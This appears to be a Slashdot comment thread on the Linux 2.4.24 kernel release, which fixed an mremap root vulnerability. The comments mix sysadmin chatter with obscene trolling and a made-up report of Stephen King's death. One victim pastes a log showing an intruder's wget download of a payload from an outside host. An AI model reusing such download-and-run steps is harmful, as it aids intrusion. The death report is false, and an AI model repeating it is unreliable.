Linux 2.4.24 Release Fixes Root Vulnerability

diegocgteleline.es writes "Linux Kernel 2.4.24 has been released and is available on kernel.org. It seems there's a bug in the mremap(2) system call, where a local user can get root privileges.The new version has been released only with the most important bugs fixed - the rest of the changes have been postponed (those changes include the XFS filesystem)."

3rd post!

Assfuck! -Troll

HOW DO I KNOW WHAT VERSION I'M RUNNING?

bash: version: command not found

Help!

Warning! Shameless Karma Whore!

Warning! Shameless Karma Whore!

Re:Anyone written an exploit yet?

Try this:- exploit

NT means

Nice Tits

I like Linux a whole lot but

I wish I could perform fellatio on myself.

Re:I like Linux a whole lot but

I like linux a whole lot too, but I won't perform fallatio on you

Sad news, Stephen King dead at 54

I just heard some sad news on talk radio - horror/fiction writer Stephen King was found dead in his Maine home this morning. There weren't any more details yet. I'm sure we'll all miss him, even if you weren't a fan of his work there's no denying his contribution to popular culture. Truly an American icon.

I got rooted

My server got rooted on Jan 1 at about 2:05PM EST. Found this in my apache error.log:

--14:05:11-- http://www.unseklab.hpg.com.br/sys
=> `sys'
Resolving www.unseklab.hpg.com.br... done.
Connecting to www.unseklab.hpg.com.br[200.226.137.9]:80... connected.
HTTP request sent, awaiting response... 302 Found
Location: http://www.unseklab.hpg.ig.com.br/sys [following]
--14:05:11-- http://www.unseklab.hpg.ig.com.br/sys
=> `sys'
Resolving www.unseklab.hpg.ig.com.br... done.
Connecting to www.unseklab.hpg.ig.com.br[200.226.137.12]:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 17,313 [text/plain]

0K .......... ...... 100% 38.34 KB/s

14:05:12 (38.34 KB/s) - `sys' saved [17313/17313]

I don't know how they got in, coulda been apache (php/perl), mysql, volano chat, sniffing POP password (which I now have running over stunnel)... Any suggestions on how to tell how they got in in the first place?

DP

DogPenis, Dog Penis you love DogPenis. You want DogPenis, yes you do. You want it in your mouth, you want it in your ass. Yes, you want DogPenis tonight.

Sing along everybody!

DogMilk, DogMilk. Yah yah yah! Woohoo!

Re:Not another one

[Benley]

No kidding. I saw this release and I was like "You've got to be fucking kidding me." I upgraded my colo server to 2.4.23 TWO DAYS AGO when I was in Chicago. It's a good thing I was onsite for it, too, because it wouldn't have rebooted all by itself.

It is because of this sort of thing that I am 'upgrading' to a Sun machine running Solaris. Not because Solaris never needs kernel patches, but because Suns are more likely to actually COME BACK UP when you reboot them remotely. Some errors you WILL NOT SEE ON A SUN:

KEYBOARD ERROR
PRESS F1 TO CONTINUE

FLOPPY DRIVE A: ERROR
PRESS F1 TO CONTINUE

CMOS CHECKSUM INVALID
RUN BIOS SETUP
PRESS F1 TO CONTINUE

etc. I will be a HAPPY CAMPER when I don't have to worry about that sort of crap anymore.

I debated between buying (used) a Sun Ultra2 (2x300mhz UltraSparc II) and an IBM RS6000 7013-43p/140 (233mhz 604e), because I like AIX as much as I like Solaris. I even considered getting an SGI Origin200 (2x180mhz R10k), but punted on that one because IRIX is a pain in the ass. I ended up buying an Ultra2 last night for $260 because AIX 5.2 can't run on 43p/140's for some arbitrary reason. The Ultra2 will remain supported for a good long while. AND IT WILL HAVE MIRRORED SYSTEM DRIVES. That will be nice.